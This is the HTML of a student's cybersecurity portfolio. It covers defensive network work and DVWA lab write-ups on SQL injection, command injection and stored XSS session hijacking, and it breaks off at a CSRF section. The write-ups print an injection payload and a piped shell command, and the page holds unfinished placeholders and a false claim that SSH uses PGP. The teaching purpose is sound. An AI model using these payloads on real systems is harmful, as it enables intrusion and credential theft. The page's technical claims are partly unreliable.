          <img class="rounded-circle img-fluid" src="img/about/4.jpg" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S7 2021</h4>
          <h4 class="subheading">My minor</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">Lorem ipsum dolor sit amet, consectetur adipisicing elit. Sunt ut voluptatum eius sapiente, totam reiciendis temporibus qui quibusdam, recusandae sit vero unde, sed, incidunt et ea quo dolore laudantium consectetur!</p>
          </div>
          </div>
          </li>
          
          <li class="timeline-inverted">
          <div class="timeline-image">
          <h4>The
          <br>Future
          </h4>
          </div>
          </li>
          </ul>
          </div>
          </div>
          </div>
          </section>
          
          <section class="bg-light" id="team">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">About me</h2>
          <h3 class="section-subheading text-muted">Some additional links and information.</h3>
          </div>
          </div>
          <div class="row">
          <div class="col-sm-4">
          
          </div>
          <div class="col-sm-4">
          <div class="team-member">
          <img class="mx-auto rounded-circle" src="img/team/Pim.jpg" alt="">
          <h4>Pim Beekmans</h4>
          <p class="text-muted">Student</p>
          <ul class="list-inline social-buttons">
          <li class="list-inline-item">
          <a href="#">
          <i class="fab fa-twitter"></i>
          </a>
          </li>
          <li class="list-inline-item">
           <a href="#">
          <i class="fab fa-facebook-f"></i>
          </a>
          </li>
          <li class="list-inline-item">
          <a href="https://www.linkedin.com/in/pim-beekmans/?originalSubdomain=nl">
          <i class="fab fa-linkedin-in"></i>
          </a>
          </li>
          </ul>
          </div>
          </div>
          <div class="col-sm-4">
          
          </div>
          <div class="row">
          <div class="col-lg-8 mx-auto text-center">
          <p class="large text-muted">This is me, thank you for reading, hopefully you've liked my portfolio on cyber security. For additional feedback feel free to send an email to <a href="/cdn-cgi/l/email-protection#ddadb4b09dbfb8b8b6b0bcb3aef3b9b8ab"><span class="__cf_email__" data-cfemail="1a6a73775a787f7f71777b7469347e7f6c">[email&#160;protected]</span></a>.</p>
          </div>
          </div>
          </div>
          </div>
          </section>
          
          <section class="py-5">
          <div class="container">
          <div class="row">
          
          </div>
          </div>
          </section>
          
          <section id="contact">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">Contact Me</h2>
          <br>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12">
          <form id="contactForm" name="sentMessage" novalidate="novalidate">
          <div class="row">
          <div class="col-md-6">
          <div class="form-group">
          <input class="form-control" id="name" type="text" placeholder="Your Name *" required="required" data-validation-required-message="Please enter your name.">
          <p class="help-block text-danger"></p>
          </div>
          <div class="form-group">
          <input class="form-control" id="email" type="email" placeholder="Your Email *" required="required" data-validation-required-message="Please enter your email address.">
          <p class="help-block text-danger"></p>
          </div>
          <div class="form-group">
          <input class="form-control" id="phone" type="tel" placeholder="Your Phone *" required="required" data-validation-required-message="Please enter your phone number.">
          <p class="help-block text-danger"></p>
          </div>
          </div>
          <div class="col-md-6">
          <div class="form-group">
          <textarea class="form-control" id="message" placeholder="Your Message *" required="required" data-validation-required-message="Please enter a message."></textarea>
          <p class="help-block text-danger"></p>
          </div>
          </div>
          <div class="clearfix"></div>
          <div class="col-lg-12 text-center">
          <div id="success"></div>
          <button id="sendMessageButton" class="btn btn-primary btn-xl text-uppercase" type="submit">Send Message</button>
          </div>
          </div>
          </form>
          </div>
          </div>
          </div>
          </section>
          
          <footer>
          <div class="container">
          <div class="row">
          <div class="col-md-4">
          <span class="copyright">Copyright &copy; Beekmans.dev 2019</span>
          </div>
          <div class="col-md-4">
          
          </div>
          <div class="col-md-4">
          <ul class="list-inline quicklinks">
          <li class="list-inline-item">
          <a href="#">Privacy Policy</a>
          </li>
          <li class="list-inline-item">
          <a href="#">Terms of Use</a>
          </li>
          </ul>
          </div>
          </div>
          </div>
          </footer>
          
          
          <div class="portfolio-modal modal fade" id="portfolioModal1" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Self Assessment</h2>
          <p class="item-intro text-muted">Week 1</p>
          <p>
          <ol>
          <li>What did you like / or find easy?</li>
          <li>What did you find difficult? At what point did it get too difficult for now?</li>
          <li>
          Then check the list of learning subjects for the basic knowledge assignment and
          possibilities and requirements for the project.
          <ul>
          <li>What subjects do you already know and what is unknown terrain for you?</li>
          </ul>
          </li>
          <li>What parts of the current semester would you like to give much attention?</li>
          <li>What do you want to achieve and learn in particular?</li>
          <li>Which study style and corresponding planning is most suitable for you?</li>
          <li>What would you like to do or achieve in the project? (subjects, type of project,
          domain to work in, learning goals, etc.)
          </li>
          </ol>
          <br>
          Answers:
          <br>
           <ol>
          <li>I like working with servers and playing with my network at home and virtual
          machines. I think I find basic networking the easiest.
          </li>
          <li>Advanced networking all knowledge that I know is self-taught so I think there is a
          lot I don’t know yet. I got stuck on virtual lans and ip routing at home what else
          I’ll find difficult is what I need to find out in the distant future.
          </li>
          <li>
          Subjects:
          <div class="container">
          <div class="row">
          <div class="col-sm-4">
          <ul>
          Used:
          <li>VMWare</li>
          <li>Linux</li>
          <li>IPv4</li>
          <li>NAT</li>
          <li>TCP/IP</li>
          <li>DNS</li>
          <li>HTTP</li>
          <li>FTP</li>
          <li>Firewalls</li>
          <li>HTTPS</li>
          <li>VPN</li>
          </ul>
          </div>
          <div class="col-sm-4">
          <ul>
          Know about but never used:
          <li>VMWare ESX</li>
          <li>Wireshark</li>
          <li>ARP</li>
          <li>IP routing</li>
          <li>SMTP</li>
          <li>IDS</li>
          </ul>
          </div>
          <div class="col-sm-4">
          <ul>
          Never heard about it:
          <li>Seclab</li>
          <li>ICMP ping</li>
          <li>CIA and IT Risk analysis</li>
          </ul>
          </div>
          </div>
          </div>
          </li>
          <li>Advanced networking and the transition to Java.</li>
          <li>How to be a good Cyber security expert.</li>
          <li>Style 2, I’ll try to find out if this is the most suitable for me and maybe go to
          the style 3 courses on the days I get subjects I already know.
          </li>
          <li>I don’t really have a preference I want to learn as much as possible related to
          cyber security.
          </li>
          </ol>
          </p>
          <ul class="list-inline">
          <li>Date: February 2019</li>
           <li>Client: Fontys</li>
          <li>Category: Self assessment</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal2" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Network diagram</p>
          <img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/NetworkDiagram.png" alt="">
          <p>This network diagram shows 3 main VLAN's containing a employee environment for the
          employees to work on, a guest environment for the people visiting the company as guests
          and a DMZ for the servers and services to the outside world.</p>
          <ul class="list-inline">
          <li>Date: February 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Documentation</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal3" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Network diagram V2</p>
          <img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/NetworkDiagramV2.png" alt="">
          <p>This is the second version of my network diagram. I changed a few things to match
          Casper's feedback. The first thing I changed are the firewalls, I only needed to address
          the physical firewall and not the ones for every single interface. The last thing was I
          added the corresponding IP ranges and subnets to each VLAN.</p>
          <ul class="list-inline">
          <li>Date: March 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Documentation</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal4" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Secure connections</p>
          <a href="../../img/portfolio/blue/sshAccess.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/sshAccess.png" alt=""></a>
          <p>Here you can see that I made a SSH connection to my Ubuntu webserver. I use Putty as my
          SSH terminal. SSH is encrypted using PGP (Pretty good privacy) which uses a public and a
          private key to communicate with each other. This is especially helpful because you don't
          need to transfer passwords to encrypt the connection. The sending client encrypts its
          message using the public key from the recipient and the recipient decrypts the message
          using its own private key. This works the same the other way around. I can use this
          technique to remotely manage my webservers without the need physical access.</p>
          <a href="../../img/portfolio/blue/vpnAccess.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/vpnAccess.png" alt=""></a>
          <p>Here you can see that I'm connected to a VPN. This VPN is OpenVPN and runs on the PfSense
          router. It gives me access to the subnets I gave it access to and with this I can
          remotely manage my whole network, with being actually physically connected to the
          network. The OpenVPN connection is encrypted be TLS (Transfer layer security) which is
          successor from SSL. TLS uses a handshake at the start of the connection where a key is
          shared between the 2 clients. This key will be used for the symmetric encryption of the
          messages. The authenticity of the connection is secured by a certificate and the public
          key of the webserver this prevents possible man in the middle attacks, where someone
          will pretend to be another website for example.</p>
          <a href="../../img/portfolio/blue/sslConnection.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/sslConnection.png" alt=""></a>
          <p>Here you can see the ssl certificate I created for the website that is running my
          portfolio. I created the script using certbot in Ubuntu and the CA is Let's encrypt
          authority x3. The website automatically forces all traffic to https, the website is
          still accessible by http but will redirect the user to https.</p>
          <ul class="list-inline">
          <li>Date: March 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Secure connections</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal5" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">IDS/IPS</p>
          <P>I implemented Suricata as my IPS, I thought it would be the best option because they say
          it's more advanced and newer. Below you can see some prove of the implementation and
          some results I came across.</P>
          <a href="../../img/portfolio/blue/Suricata1.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Suricata1.png" alt=""></a>
          <p>I configured the IPS to monitor the WAN and LAN interface for now but I'm planning to
          configure it to the Employee VLAN as well. This will protect the company for any
          potential threats from the inside.</p>
          <a href="../../img/portfolio/blue/Suricata2.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Suricata2.png" alt=""></a>
          <p>I tested the IPS with a website called <a href="https://www.wicar.org/">Wicar</a>. On
          this website you can run malicious code and test you network without it being an actual
          threat or risk.</p>
          <a href="../../img/portfolio/blue/Suricata3.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Suricata3.png" alt=""></a>
          <p>I have used the Snort community rules and the Emerging threats rules these are both free
          to use and do a decent job of protecting the network with not too many false
          positives.</p>
          <a href="../../img/portfolio/blue/DDOSAlert.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/DDOSAlert.png" alt=""></a>
          <p>We encountered a real world scenario which actually turned out to work really well with
          an IPS. Bram tried to DDOS my website while it was running in my pfsense environment.
          The IPS immediately noticed this and blocked his IP. While the website was running
          outside the pfsense zone Bram could DDOS all he want without getting blocked.</p>
          <a href="../../img/portfolio/blue/BlockList.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/BlockList.png" alt=""></a>
          <p>Here you can see Bram's IP in the Suricata blocklist.</p>
          <a href="../../img/portfolio/blue/Bram'sIP.jpg"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Bram'sIP.jpg" alt=""></a>
          <p>This is a screenshot from Bram's computer with his IP he used for generating the
          alert.</p>
          <ul class="list-inline">
          <li>Date: April 2019</li>
          <li>Client: Fontys</li>
          <li>Category: IDS/IPS</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal6" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Information Security and Risk Analysis</p>
          <h3>CIA</h3>
          <h4>Confidentiality:</h4>
          <p>The company will hold confidential data from costumers, things like credit card
          information user accounts and databases for the costumer's websites.</p>
          <br>
          <ul>
          <li>Attribute .... Threat</li>
          <li>Costumer data .... Leak</li>
          </ul>
          <h4>Integrity:</h4>
          <p>The costumers trust the company to secure their servers on their end and they trust the
          company that it won't sell any costumer data to 3rd parties.</p>
          <br>
          <ul>
          <li>Attribute .... Threat</li>
          <li>Correct .... Tampering</li>
          </ul>
          <h4>Availability:</h4>
          <p>Because the costumers might use these websites for commercial use, it is at the utmost
          importance that the websites are fast, reliable and 24/7 reachable.</p>
          <br>
          <ul>
          <li>Attribute .... Threat</li>
           <li>Well timed .... Delay</li>
          <li>Continuity .... Downtime</li>
          </ul>
          <p>Click on this <a href="../../img/portfolio/Risk%20analysis.xlsx">link</a> to download the full
          risk analysis.</p>
          <ul class="list-inline">
          <li>Date: April 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Risk Analysis</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal7" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">IT Monitoring</p>
          <p>I implemented a Nagios server and installed Ntop as part of my network monitoring
          system.</p>
          <a href="../../img/portfolio/blue/OnlineHosts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/OnlineHosts.png" alt=""></a>
          <p>Ntop generates a list with all hosts that are online on the network and you can filter
          them by VLAN. You can see how much bandwidth they are using how much data was
          transferred since they are online and how many flows are going to that host.</p>
          <a href="../../img/portfolio/blue/MostUsedHosts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/MostUsedHosts.png" alt=""></a>
          <p>Here I can see which host uses the most traffic in my DMZ. With 172.16.0.2 being the
          apache server and 172.16.0.3 being the IIS server.</p>
          <a href="../../img/portfolio/blue/MostUsedProtocols.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/MostUsedProtocols.png" alt=""></a>
          <p>Here I can see which protocols are used the most. Windows update on number 1 because it
          needs to download a lot and after that ssl for the https traffic to my website and ftp
          to push changes. This doesn't indicate that the most traffic is going to windows update
          only that it used the most bandwidth.</p>
          <a href="../../img/portfolio/blue/BulgarianHacker.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/BulgarianHacker.png" alt=""></a>
          <p>Ntop even managed to identify a rogue Bulgarian hacker trying to access my Jenkins
          server.</p>
          <a href="../../img/portfolio/blue/HostsStatus.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/HostsStatus.png" alt=""></a>
          <p>This is Nagios it is in some ways similar to Ntop but is much more advanced and can do
          some things that Ntop can't. On this page you can see al the hosts that are monitored by
          Nagios. It displays if the hosts are up and running or if there are any problems.</p>
          <a href="../../img/portfolio/blue/HostDetails.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/HostDetails.png" alt=""></a>
          <p>If you click on one of the monitored hosts from the previous picture Nagios will show you
          with a more detailed report on the host with some more information about uptime and
          status.</p>
          <a href="../../img/portfolio/blue/ServiceStatus.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/ServiceStatus.png" alt=""></a>
          <p>This is a great example on something Nagios is much better at then Ntop. Here Nagios
          monitors all the services you flagged on different hosts. For example your apache server
          could be down but the physical Linux server is still up and running. Nagios and Ntop
          will both say this Linux machine is up and fine but Nagios will also say that the
          http/https service is down. The same goes for every other service you configure to
          monitor (SSH/FTP).</p>
          <ul class="list-inline">
          <li>Date: April 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Monitoring</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal8" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">SQL injection</p>
          <a href="../../img/portfolio/red/SqlStart.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/SqlStart.png" alt=""></a>
          <p>I applied sql injection on a search function in DVWA.</p>
           <a href="../../img/portfolio/red/CheckIfVuln.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CheckIfVuln.png" alt=""></a>
          <p>The easiest way to check if the search function is vulnerable is to just type some
          gibberish that the search function doesn't expect. This should generate a sql error.</p>
          <a href="../../img/portfolio/red/CheckIfVulnResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CheckIfVulnResult.png" alt=""></a>
          <p>And it did! Now we know that the search function is vulnerable and we can try some
          injections</p>
          <p>So know we can check which database we're dealing with by getting the version.</p>
          <a href="../../img/portfolio/red/GetDbVersion.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/GetDbVersion.png" alt=""></a>
          <p>Oke let's break it down.</p>
          <p>The query that is used for searching the users probably looks like something like this
          "SELECT first_name, last_name FROM users WHERE user_id = '$id'" and I typed "null' UNION
          select CURRENT_user, @@version #"</p>
          <p>The "null'" ends the original query and makes it obsolete because there probably aren't
          any users with a 'null' as id. The 'UNION' allows me to execute a subquery and the
          result from this query gets added underneath the results from the original query.</p>
          <p>Now I use 'select' to indicate which information I want to get. I used 'CURRENT_user' and
          '@@version' to get both the current user and the database version.</p>
          <p>The reason that I select both the "CURRENT_user" and the "@@version" in the same query,
          is that if I would only select for example "@@version" I would get the error displayed
          below. I could have fixed that by rewriting the query like this: "INSERT QUERY" and I
          typed "null' UNION select @@version, @@version #" This way the subquery matches the
          amount of columns of the original query again.</p>
          <a href="../../img/portfolio/Use%20Of%23.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/Use%20Of%23.png" alt=""></a>
          <p>TALK ABOUT THE #</p>
          <a href="../../img/portfolio/red/DiffNumberColumns.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/DiffNumberColumns.png" alt=""></a>
          <p>Now we can execute any query we want as long as it matches the amount of columns of the
          original query, otherwise we get a error like the one displayed above. Now we can try
          something that has a little more impact.</p>
          <a href="../../img/portfolio/red/GetAllTables.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/GetAllTables.png" alt=""></a>
          <p>For example by getting all the table names inside the database. This is obvious not a
          good sign because I good use this to determine what the names are of the user tables and
          check if there might be some more tables I want to focus on, for example credit card
          information of the users.</p>
          <a href="../../img/portfolio/red/GetUserAndPass.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/GetUserAndPass.png" alt=""></a>
          <p>But in this case we won't go after people's credit card information but after there
          password. I know the user table name from the previous query and now I can just try some
          common column names like; username, user, name, those type of things.</p>
          <p>And we got a username and a hash! But now what? The username is simple but the password
          is hashed and can't be just copied and used.</p>
          <a href="../../img/portfolio/red/HashDecrypt.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/HashDecrypt.png" alt=""></a>
          <p>That's were this site comes in. I just insert the md5 hash in this decryptor and it
          checks a big database with common hashes and their decrypted word. And now I have the
          password and I can just login with admin/password.</p>
          <p>So how would you prevent this? The best thing to do is sanitize the queries. Make sure
          all the queries use prepared statements and are parameterised. This prevents people
          inserting for example strings instead of numbers and prevents them from ignoring your
          query and inserting their own.</p>
          <ul class="list-inline">
          <li>Date: October 2019</li>
          <li>Client: Fontys</li>
          <li>Category: SQL injection</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal9" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Command injection</p>
          <p>I applied sql injection on a ping function in DVWA.</p>
           <a href="img/portfolio/Command%20injection.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/Command%20injection.png" alt=""></a>
          <p>The way this function works is it takes the ip and inserts it directly in a shell. It
          would probably looks like something like this "ping 'INSERTED_IP'".</p>
          <p>Now this little symbol "|" is called a pipe and it can be used to execute multiple
          commands in one line. So I used the "|" to execute my own command after the ping command
          just like shown above.</p>
          <p>I typed in the ip because it still needs to execute the ping command and after that I did
          a "ipconfig" so the command would look like this when executed in the shell: "ping
          185.230.127.234 | ipconfig" This gave us the ip information of the machine the webpage
          is running on.</p>
          <a href="../../img/portfolio/red/CmdCurrentUser.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CmdCurrentUser.png" alt=""></a>
          <p>I can also get the current user logged in user from the machine using "net user". But
          with "net user" you can do much more even change the password of the current user or
          create a completely new user just for me.</p>
          <a href="../../img/portfolio/red/CmdWifiPass.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CmdWifiPass.png" alt=""></a>
          <p>What is maybe even better I can get the wifi password of the connected pc in plain text.
          Now I can connect to the same network because I know the password.</p>
          <a href="../../img/portfolio/red/CmdEnterpriceWifi.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CmdEnterpriceWifi.png" alt=""></a>
          <p>This trick doesn't work with more advanced wifi security though. Here you see the eduroam
          network from school which is protected with 802.1x control. This doesn't mean you can't
          get the password at all it just makes it a whole lot harder.</p>
          <a href="../../img/portfolio/red/CIDIR.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CIDIR.png" alt=""></a>
          <p>I was also able to run the "dir" command. This tells me a lot about the local machine and
          how the web server is installed.</p>
          <a href="../../img/portfolio/red/CISystemInfo.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CISystemInfo.png" alt=""></a>
          <P>With the "systeminfo" command I'm able to get a lot of information about the physical
          machine which might be useful to me later. It greatly increases my attack surface.</P>
          <p>This can be prevented by sanitizing the input and not just inserting it straight into the
          shell. Make sure it goes to a parameterised function first, check the input and then
          insert it into a shell for example.</p>
          <ul class="list-inline">
          <li>Date: October 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Command injection</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal10" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Cross-site scripting</p>
          <p>I will now show you how you could apply XSS to a website.</p>
          <a href="../../img/portfolio/red/XSSAlert.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSAlert.png" alt=""></a>
          <p>First I have to check if the website is vulnerable. The easiest way to check this is just
          to try a simple "Alert" script just like this.</p>
          <a href="../../img/portfolio/red/XSSAlertResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSAlertResult.png" alt=""></a>
          <p>As you can see the script works so that means that the website is vulnerable to XSS. Now
          I can try something that has some more impact and could actually be useful for me.</p>
          <a href="../../img/portfolio/red/MaxCharLimit.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/MaxCharLimit.png" alt=""></a>
          <p>This form doesn't allow more than 50 characters, so writing bigger scripts might make
          this difficult. Luckily they only validate this in the frontend so I can just inspect
          this page and change the maximum characters in the form. So now I can write some bigger
          scripts that give me more information.</p>
          <a href="../../img/portfolio/red/XSSGetCookie.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSGetCookieResult.png" alt=""></a>
          <p>Like getting the cookie of the user so I can hijack their session.</p>
          <a href="../../img/portfolio/red/XSSGetCookieResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSGetCookieResult.png" alt=""></a>
          <p>So now I got the cookie it is my own though, but these scripts get stored inside the
          comments and the comments are persistent. Therefore I could also write a script that
          sends the cookie to me instead of displaying it. This way I can make it almost invisible
          for everyone to see and everyone who loads this page their cookie gets send to me.</p>
          <a href="../../img/portfolio/red/XSSOldCookie.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSOldCookie.png" alt=""></a>
          <p>Now I can try to use the cookie that I stole in the previous picture to try and login. As
          you can see my cookie is now different and I'm not logged in.</p>
          <a href="../../img/portfolio/red/XSSNewCookie.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSNewCookie.png" alt=""></a>
          <p>Now I placed the cookie I stole in my own cookie to hopefully make the website think I'm
          the person who is logged in that I stole this cookie from.</p>
          <a href="../../img/portfolio/red/XSSSessionHijack.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSSessionHijack.png" alt=""></a>
          <p>And now when I try to load the index page the website thinks I'm logged in as the person
          the cookie belongs to and I hijacked their session. I can now do everything on their
          account, comment in their name and change their data or steal their data.</p>
          <p>And if this person is by any chance an admin I might be able to do some more extreme
          things as well. Like creating or deleting users or their comments.</p>
          <a href="../../img/portfolio/red/XSSIframe.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSIframe.png" alt=""></a>
          <P>Sometimes the programmers try to prevent XSS by filtering out the script tags. But they
          forget the filter out all the other HTML tags. So I can load my own website in an
          "Iframe".</P>
          <a href="../../img/portfolio/red/XSSIframeResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSIframeResult.png" alt=""></a>
          <p>This might only sound as good free marketing but you can also do other things. Like
          redirecting everyone that visits this page to my own website or inject scripts in other
          html tags, so I can still run my scripts even though they banned the script tags.</p>
          <p>These type of attacks can be prevented by sanitizing the input much like SQL injection.
          Make sure that all the text that users can post to the website's frontend doesn't get
          converted to straight HTML. In this way they can't exploit other HTML tags as well.</p>
          <ul class="list-inline">
          <li>Date: October 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Cross-site scripting</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal11" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Cross-site request forgery</p>
          <p>Now I'm going to exploit CSRF on a website. The principles are quite simple, if you see
          the query that is called in the search bar, then the website might be vulnerable.</p>
